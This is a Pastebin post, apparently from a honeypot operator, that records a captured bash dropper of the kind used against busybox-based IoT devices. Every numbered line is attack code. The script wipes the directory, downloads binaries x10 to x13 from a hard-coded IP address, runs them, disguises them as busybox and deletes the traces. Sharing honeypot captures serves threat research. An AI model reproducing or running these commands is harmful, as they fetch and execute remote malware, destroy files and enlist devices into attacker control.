Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-02-18 10:16

Feb 18th, 2016
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.19 KB | None | 0 0
  1. ulimit -u 512
  2. ulimit -n 512
  3. rm -f *
  4. busybox wget -q http://45.32.232.197/x10; busybox chmod +x x10; ./x10; busybox rm -f x10*
  5. rm -f *
  6. busybox wget -q http://45.32.232.197/x11; busybox chmod +x x11; ./x11; busybox rm -f x11*
  7. rm -f *
  8. busybox wget -q http://45.32.232.197/x12; busybox chmod +x x12; ./x12; busybox rm -f x12*
  9. rm -f *
  10. busybox wget -q http://45.32.232.197/x13; busybox chmod +x x13; ./x13; busybox rm -f x13*
  11. rm -f *
  12. busybox wget -q http://45.32.232.197/x10; busybox cp /bin/busybox ./; busybox cat x10 > busybox; busybox rm -f x10; busybox cp busybox x10; busybox rm -f busybox; ./x10; busybox rm -f x10*
  13. rm -f *
  14. busybox wget -q http://45.32.232.197/x11; busybox cp /bin/busybox ./; busybox cat x11 > busybox; busybox rm -f x11; busybox cp busybox x11; busybox rm -f busybox; ./x11; busybox rm -f x11*
  15. rm -f *
  16. busybox wget -q http://45.32.232.197/x12; busybox cp /bin/busybox ./; busybox cat x12 > busybox; busybox rm -f x12; busybox cp busybox x12; busybox rm -f busybox; ./x12; busybox rm -f x12*
  17. rm -f *
  18. busybox wget -q http://45.32.232.197/x13; busybox cp /bin/busybox ./; busybox cat x13 > busybox; busybox rm -f x13; busybox cp busybox x13; busybox rm -f busybox; ./x13; busybox rm -f x13*
  19. rm -f *
  20. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement